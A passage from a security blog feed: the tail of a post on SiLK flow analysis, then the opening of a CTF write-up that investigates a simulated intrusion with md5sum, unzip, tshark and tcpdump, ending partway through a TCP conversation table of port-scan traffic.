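<div>The ordering is by bucket value, not by volume, which matches rwtotal's tables above; when the question is "which port carries the most bytes", sort the returned rows on the bytes column instead, or reach for rwstats.</div>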
</div><div><br /></div><div><br /></div><div><div>Reference:</div><div><a href="https://tools.netsa.cert.org/silk/analysis-handbook.pdf">https://tools.netsa.cert.org/silk/analysis-handbook.pdf</a></div><div><a href="https://resources.sei.cmu.edu/asset_files/Presentation/2014_017_001_90110.pdf">https://resources.sei.cmu.edu/asset_files/Presentation/2014_017_001_90110.pdf</a></div><div><a href="https://www.ibm.com/docs/en/qsip/7.4?topic=applications-icmp-type-code-ids">https://www.ibm.com/docs/en/qsip/7.4?topic=applications-icmp-type-code-ids</a></div><div><a href="https://apps.dtic.mil/sti/pdfs/AD1084382.pdf">https://apps.dtic.mil/sti/pdfs/AD1084382.pdf</a></div><div><a href="https://tools.netsa.cert.org/silk/silk-reference-guide.pdf">https://tools.netsa.cert.org/silk/silk-reference-guide.pdf</a></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1tag:blogger.com,1999:blog-7303400454979750101.post-41224861664726663162023-09-01T20:57:00.001-07:002023-09-02T05:29:33.135-07:00Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego<p>At work, we develop and run various Cyber Security challenges to help the Analyst (and the rest of the team) to rapidly build and demonstrate their skillset. This challenge was put together by one of our Managers <a href="https://www.linkedin.com/in/jeanmarranzini" target="_blank">Jean</a>. I thought this was an interesting challenge that covered a number of areas. As a result, I thought I should take a stab at it. Here is my write up of my analysis.</p><p><span style="font-size: large;">Summary<br /></span>On July 23, 2023 at 23:13 a report was made of suspicious activity relating to someone scanning the 10.240.240.0/24 subnet. Upon investigation, it was determined that these scans originated from the device at IP 10.240.240.5. This device is currently used by the user Newman. 
The scan successfully identified services for SMB, MSSQL and others. While not found via the scan, the user of the Newman account was able to log in to the PC at 10.240.240.4 on port 5985, which is associated with PowerShell Remoting. There were also connections made from 10.240.240.4 to 10.240.240.6 on port 1433, which is associated with MSSQL.</p><p>Further analysis of this activity determined that a malicious file pretending to be a Windows update was executed on the system, resulting in a number of processes being spawned. Most of these activities were performed by the user account Jerry, who is the authenticated user on Jerry-PC.</p><p>The image below shows a synopsis of the activity.</p><p><br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPi8khr9oXDo9jj3_9yril2oJOoHZy8s3R-UBfQUa0v-6w_cdSHSM8HFCVYoySa5WAdjvjuIFx2N55wAvnpafmJitO0KJ42XYeZK6J1JCqHbtvlSqkMluFxZPjcV9dAYxzQr25vk9j6lqhUz3mU-MHoGvq4NNnwR-OsgNBKk1e4cxkzglOs02RsYJTbLQ/s1422/Nik%20Process%20Diagram.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1422" data-original-width="1220" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPi8khr9oXDo9jj3_9yril2oJOoHZy8s3R-UBfQUa0v-6w_cdSHSM8HFCVYoySa5WAdjvjuIFx2N55wAvnpafmJitO0KJ42XYeZK6J1JCqHbtvlSqkMluFxZPjcV9dAYxzQr25vk9j6lqhUz3mU-MHoGvq4NNnwR-OsgNBKk1e4cxkzglOs02RsYJTbLQ/w549-h640/Nik%20Process%20Diagram.gif" width="549" /></a></div><br /><br /><p></p><p><span style="font-size: large;">Detailed Analysis</span></p><p>First, start by looking at the evidence file provided.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ md5sum challenge_data.zip </span>
<span style="color: white;">6f620299c237236c068ef3000d086833 challenge_data.zip</span>
</pre></div>
</div><div><br /></div><div><div>Extract the files.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ unzip challenge_data.zip -d jean_challenge/</span>
<span style="color: white;">Archive: challenge_data.zip</span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.csv </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.evtx </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.txt </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-4-events.xml </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.csv </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.evtx </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.txt </span>
<span style="color: white;"> inflating: jean_challenge/endpoint_logs/10-240-240-5-events.xml </span>
<span style="color: white;"> inflating: jean_challenge/packet_capture/packet_capture.pcap </span>
<span style="color: white;"> inflating: jean_challenge/packet_capture/packet_capture.pcapng </span>
<span style="color: white;"> inflating: jean_challenge/sql_logs/sql_logs.csv </span>
<span style="color: white;"> inflating: jean_challenge/sql_logs/sql_logs.xel </span>
<span style="color: white;"> inflating: jean_challenge/usbstick_image/usbstick.vhd </span>
</pre></div>
</div><div><br /></div><div><div>Starting with my strengths, performing network forensics on <i>packet_capture.pcapng</i> using <a href="https://www.amazon.com/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024" target="_blank">Tshark</a>. Looking at the protocol hierarchy to see what is in the PCAP.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z io,phs</span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:4926 bytes:1917097</span>
<span style="color: white;"> arp frames:718 bytes:40020</span>
<span style="color: white;"> ip frames:4208 bytes:1877077</span>
<span style="color: white;"> udp frames:26 bytes:5222</span>
<span style="color: white;"> nbdgm frames:8 bytes:1944</span>
<span style="color: white;"> smb frames:8 bytes:1944</span>
<span style="color: white;"> mailslot frames:8 bytes:1944</span>
<span style="color: white;"> browser frames:8 bytes:1944</span>
<span style="color: white;"> nbns frames:4 bytes:582</span>
<span style="color: white;"> data frames:6 bytes:2052</span>
<span style="color: white;"> mdns frames:8 bytes:644</span>
<span style="color: white;"> tcp frames:4146 bytes:1864247</span>
<span style="color: white;"> data frames:72 bytes:4536</span>
<span style="color: white;"> nbss frames:728 bytes:126126</span>
<span style="color: white;"> smb frames:4 bytes:888</span>
<span style="color: white;"> smb2 frames:710 bytes:123980</span>
<span style="color: white;"> data frames:117 bytes:20181</span>
<span style="color: white;"> tds frames:144 bytes:48140</span>
<span style="color: white;"> tcp.segments frames:3 bytes:3716</span>
<span style="color: white;"> _ws.malformed frames:3 bytes:857</span>
<span style="color: white;"> dcerpc frames:18 bytes:5028</span>
<span style="color: white;"> oxid frames:4 bytes:552</span>
<span style="color: white;"> isystemactivator frames:2 bytes:1900</span>
<span style="color: white;"> tls frames:91 bytes:34985</span>
<span style="color: white;"> http frames:569 bytes:372420</span>
<span style="color: white;"> xml frames:569 bytes:372420</span>
<span style="color: white;"> tcp.segments frames:382 bytes:159294</span>
<span style="color: white;"> icmp frames:36 bytes:7608</span>
<span style="color: white;"> data frames:6 bytes:2220</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Identifying the number of unique TCP sessions in the file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -T fields -e tcp.stream | sort | uniq --count | sort --numeric-sort --reverse | wc --lines </span>
<span style="color: white;">300</span>
</pre></div>
</div><div><br /></div><div><div>With 300 unique sessions where to start?! Looking at the unique IPs in the file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z conv,ip | sed '1,5d;$d' | cut --fields 1 --delimiter ' ' | sort --uniq</span>
<span style="color: white;">10.240.240.4</span>
<span style="color: white;">10.240.240.5</span>
<span style="color: white;">10.240.240.6</span>
</pre></div>
</div><div><br /></div><div><div>Looking at how these IPs were communicating.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r packet_capture.pcapng -z conv,ip</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">IPv4 Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.4 1381 653 kB 1795 1,071 kB 3176 1,725 kB 9.965524000 625.0360</span>
<span style="color: white;">10.240.240.4 <-> 10.240.240.6 240 43 kB 294 68 kB 534 112 kB 123.097336000 526.4997</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.6 211 15 kB 271 21 kB 482 36 kB 9.965348000 22.3932</span>
<span style="color: white;">10.240.240.4 <-> 224.0.0.251 0 0 bytes 4 296 bytes 4 296 bytes 149.549610000 0.6121</span>
<span style="color: white;">10.240.240.6 <-> 224.0.0.251 0 0 bytes 4 348 bytes 4 348 bytes 149.552598000 0.6092</span>
<span style="color: white;">10.240.240.4 <-> 10.240.240.255 0 0 bytes 3 729 bytes 3 729 bytes 9.784243000 359.6082</span>
<span style="color: white;">10.240.240.5 <-> 10.240.240.255 0 0 bytes 3 729 bytes 3 729 bytes 15.335371000 360.2213</span>
<span style="color: white;">10.240.240.6 <-> 10.240.240.255 0 0 bytes 2 486 bytes 2 486 bytes 120.685407000 479.2508</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>From above, we can see the first 3 conversations have the most frames, while the last 5 have 0 frames coming back. </div><div><br /></div><div>Looking at the first IP conversation, it has a duration of 625 seconds. The second lasts 526 seconds and the third 22 seconds.</div><div><br /></div><div>Taking a look at the communication between the first two hosts. If you are wondering why the switch to <i>tcpdump</i>, it was just an accident, nothing specific.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tcpdump -n -r packet_capture.pcapng 'host 10.240.240.5 and 10.240.240.4' -w 5-4.pcap</span>
</pre></div>
</div><div><br /></div><div><div>How many sessions do we have now that occurred between these two hosts?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r 5-4.pcap -T fields -e tcp.stream | sort | uniq --count | sort --numeric-sort --reverse | wc --lines</span>
<span style="color: white;">129</span>
</pre></div>
</div><div><br /></div><div><div>Ok, with 129 sessions, where do I start?! Asking this question again, this time from the TCP conversations perspective.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -q -r 5-4.pcap -z conv,tcp</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.4:49674 <-> 10.240.240.5:445 360 63 kB 466 67 kB 826 130 kB 76.244037000 542.9534</span>
<span style="color: white;">10.240.240.5:49704 <-> 10.240.240.4:5985 378 338 kB 390 221 kB 768 559 kB 182.473326000 429.0919</span>
<span style="color: white;">10.240.240.5:49706 <-> 10.240.240.4:5985 216 128 kB 479 418 kB 695 547 kB 182.937975000 444.0836</span>
<span style="color: white;">10.240.240.5:49705 <-> 10.240.240.4:5985 182 110 kB 402 356 kB 584 467 kB 182.860278000 428.7639</span>
<span style="color: white;">10.240.240.5:49682 <-> 10.240.240.4:135 4 264 bytes 5 468 bytes 9 732 bytes 9.194943000 0.0060</span>
<span style="color: white;">10.240.240.5:49675 <-> 10.240.240.4:135 3 186 bytes 5 332 bytes 8 518 bytes 3.175866000 6.0191</span>
<span style="color: white;">10.240.240.5:49676 <-> 10.240.240.4:139 3 186 bytes 5 318 bytes 8 504 bytes 3.176094000 6.0231</span>
<span style="color: white;">10.240.240.5:49686 <-> 10.240.240.4:139 3 186 bytes 5 468 bytes 8 654 bytes 9.198805000 0.0040</span>
<span style="color: white;">10.240.240.5:49677 <-> 10.240.240.4:445 2 126 bytes 3 348 bytes 5 474 bytes 3.176193000 6.0172</span>
<span style="color: white;">10.240.240.5:49683 <-> 10.240.240.4:445 2 126 bytes 3 186 bytes 5 312 bytes 9.196929000 0.0032</span>
<span style="color: white;">10.240.240.5:49689 <-> 10.240.240.4:445 2 126 bytes 3 198 bytes 5 324 bytes 9.201052000 0.0020</span>
<span style="color: white;">10.240.240.5:49691 <-> 10.240.240.4:445 2 126 bytes 3 268 bytes 5 394 bytes 9.203503000 0.0006</span>
<span style="color: white;">10.240.240.5:49693 <-> 10.240.240.4:445 2 126 bytes 3 290 bytes 5 416 bytes 9.204569000 0.0006</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:135 1 60 bytes 2 120 bytes 3 180 bytes 1.986875000 0.0003</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:139 1 60 bytes 2 120 bytes 3 180 bytes 1.987486000 0.0004</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:445 1 60 bytes 2 120 bytes 3 180 bytes 1.989021000 0.0002</span>
<span style="color: white;">10.240.240.5:63115 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.311654000 0.0004</span>
<span style="color: white;">10.240.240.5:63116 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.413983000 0.0003</span>
<span style="color: white;">10.240.240.5:63117 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.521630000 0.0005</span>
<span style="color: white;">10.240.240.5:63118 <-> 10.240.240.4:135 1 74 bytes 2 130 bytes 3 204 bytes 14.627085000 0.0004</span>
<span style="color: white;">10.240.240.5:63119 <-> 10.240.240.4:135 1 74 bytes 2 134 bytes 3 208 bytes 14.733035000 0.0006</span>
<span style="color: white;">10.240.240.5:63120 <-> 10.240.240.4:135 1 70 bytes 2 130 bytes 3 200 bytes 14.839555000 0.0006</span>
<span style="color: white;">10.240.240.5:63127 <-> 10.240.240.4:135 1 66 bytes 2 126 bytes 3 192 bytes 14.983360000 0.0004</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:25 1 60 bytes 1 60 bytes 2 120 bytes 1.985584000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:143 1 60 bytes 1 60 bytes 2 120 bytes 1.985873000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:80 1 60 bytes 1 60 bytes 2 120 bytes 1.986099000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:554 1 60 bytes 1 60 bytes 2 120 bytes 1.986254000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:111 1 60 bytes 1 60 bytes 2 120 bytes 1.987703000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5900 1 60 bytes 1 60 bytes 2 120 bytes 1.988023000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8888 1 60 bytes 1 60 bytes 2 120 bytes 1.988265000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1720 1 60 bytes 1 60 bytes 2 120 bytes 1.988459000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1723 1 60 bytes 1 60 bytes 2 120 bytes 1.988511000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1025 1 60 bytes 1 60 bytes 2 120 bytes 1.988725000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:21 1 60 bytes 1 60 bytes 2 120 bytes 1.988861000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:199 1 60 bytes 1 60 bytes 2 120 bytes 1.989295000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8080 1 60 bytes 1 60 bytes 2 120 bytes 1.989493000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3389 1 60 bytes 1 60 bytes 2 120 bytes 1.989684000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:995 1 60 bytes 1 60 bytes 2 120 bytes 1.989834000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:23 1 60 bytes 1 60 bytes 2 120 bytes 1.989958000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:110 1 60 bytes 1 60 bytes 2 120 bytes 1.990236000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3306 1 60 bytes 1 60 bytes 2 120 bytes 1.990361000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:53 1 60 bytes 1 60 bytes 2 120 bytes 1.990590000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:587 1 60 bytes 1 60 bytes 2 120 bytes 1.990756000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:22 1 60 bytes 1 60 bytes 2 120 bytes 1.990917000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:993 1 60 bytes 1 60 bytes 2 120 bytes 1.991138000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:113 1 60 bytes 1 60 bytes 2 120 bytes 1.991356000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:443 1 60 bytes 1 60 bytes 2 120 bytes 1.991532000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:4899 1 60 bytes 1 60 bytes 2 120 bytes 1.991827000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1110 1 60 bytes 1 60 bytes 2 120 bytes 1.991970000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:179 1 60 bytes 1 60 bytes 2 120 bytes 1.992097000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:37 1 60 bytes 1 60 bytes 2 120 bytes 1.992311000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2049 1 60 bytes 1 60 bytes 2 120 bytes 1.992457000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:88 1 60 bytes 1 60 bytes 2 120 bytes 1.992611000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8000 1 60 bytes 1 60 bytes 2 120 bytes 1.992774000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:990 1 60 bytes 1 60 bytes 2 120 bytes 1.992920000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:119 1 60 bytes 1 60 bytes 2 120 bytes 1.993156000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5000 1 60 bytes 1 60 bytes 2 120 bytes 1.993334000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6646 1 60 bytes 1 60 bytes 2 120 bytes 1.993476000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1026 1 60 bytes 1 60 bytes 2 120 bytes 1.993644000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:32768 1 60 bytes 1 60 bytes 2 120 bytes 1.993823000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49154 1 60 bytes 1 60 bytes 2 120 bytes 1.993909000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1900 1 60 bytes 1 60 bytes 2 120 bytes 1.994024000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3128 1 60 bytes 1 60 bytes 2 120 bytes 1.994155000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5800 1 60 bytes 1 60 bytes 2 120 bytes 1.994324000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:7070 1 60 bytes 1 60 bytes 2 120 bytes 1.994457000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:544 1 60 bytes 1 60 bytes 2 120 bytes 1.994629000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5101 1 60 bytes 1 60 bytes 2 120 bytes 1.994841000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:548 1 60 bytes 1 60 bytes 2 120 bytes 1.994962000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1029 1 60 bytes 1 60 bytes 2 120 bytes 1.995248000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9100 1 60 bytes 1 60 bytes 2 120 bytes 1.995410000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5432 1 60 bytes 1 60 bytes 2 120 bytes 1.995574000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:26 1 60 bytes 1 60 bytes 2 120 bytes 1.995694000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:10000 1 60 bytes 1 60 bytes 2 120 bytes 1.995838000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:81 1 60 bytes 1 60 bytes 2 120 bytes 1.995984000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:389 1 60 bytes 1 60 bytes 2 120 bytes 1.996095000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:515 1 60 bytes 1 60 bytes 2 120 bytes 1.996281000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8009 1 60 bytes 1 60 bytes 2 120 bytes 1.996376000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9999 1 60 bytes 1 60 bytes 2 120 bytes 1.996896000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1755 1 60 bytes 1 60 bytes 2 120 bytes 2.015660000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:631 1 60 bytes 1 60 bytes 2 120 bytes 2.015826000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:514 1 60 bytes 1 60 bytes 2 120 bytes 2.015934000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5060 1 60 bytes 1 60 bytes 2 120 bytes 2.016081000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8081 1 60 bytes 1 60 bytes 2 120 bytes 2.016204000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2001 1 60 bytes 1 60 bytes 2 120 bytes 2.016340000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6001 1 60 bytes 1 60 bytes 2 120 bytes 2.016520000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:9 1 60 bytes 1 60 bytes 2 120 bytes 2.016648000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:144 1 60 bytes 1 60 bytes 2 120 bytes 2.016830000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1433 1 60 bytes 1 60 bytes 2 120 bytes 2.017082000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:465 1 60 bytes 1 60 bytes 2 120 bytes 2.017231000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:543 1 60 bytes 1 60 bytes 2 120 bytes 2.017384000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:3000 1 60 bytes 1 60 bytes 2 120 bytes 2.017494000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:873 1 60 bytes 1 60 bytes 2 120 bytes 2.017645000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1027 1 60 bytes 1 60 bytes 2 120 bytes 2.017752000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49155 1 60 bytes 1 60 bytes 2 120 bytes 2.017935000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49157 1 60 bytes 1 60 bytes 2 120 bytes 2.018088000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:646 1 60 bytes 1 60 bytes 2 120 bytes 2.018236000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:2717 1 60 bytes 1 60 bytes 2 120 bytes 2.018423000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:6000 1 60 bytes 1 60 bytes 2 120 bytes 2.018545000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5666 1 60 bytes 1 60 bytes 2 120 bytes 2.018685000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:79 1 60 bytes 1 60 bytes 2 120 bytes 2.018788000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:13 1 60 bytes 1 60 bytes 2 120 bytes 2.019002000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49152 1 60 bytes 1 60 bytes 2 120 bytes 2.019137000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5190 1 60 bytes 1 60 bytes 2 120 bytes 2.019263000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:1028 1 60 bytes 1 60 bytes 2 120 bytes 2.031115000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:49153 1 60 bytes 1 60 bytes 2 120 bytes 2.031253000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8008 1 60 bytes 1 60 bytes 2 120 bytes 2.031431000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5051 1 60 bytes 1 60 bytes 2 120 bytes 2.031644000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:513 1 60 bytes 1 60 bytes 2 120 bytes 2.031784000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5357 1 60 bytes 1 60 bytes 2 120 bytes 2.031926000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:444 1 60 bytes 1 60 bytes 2 120 bytes 2.032042000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:8443 1 60 bytes 1 60 bytes 2 120 bytes 2.032208000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:7 1 60 bytes 1 60 bytes 2 120 bytes 2.032387000 0.0002</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:427 1 60 bytes 1 60 bytes 2 120 bytes 2.032541000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5009 1 60 bytes 1 60 bytes 2 120 bytes 2.032698000 0.0000</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:106 1 60 bytes 1 60 bytes 2 120 bytes 2.032788000 0.0001</span>
<span style="color: white;">10.240.240.5:44893 <-> 10.240.240.4:5631 1 60 bytes 1 60 bytes 2 120 bytes 2.033075000 0.0002</span>
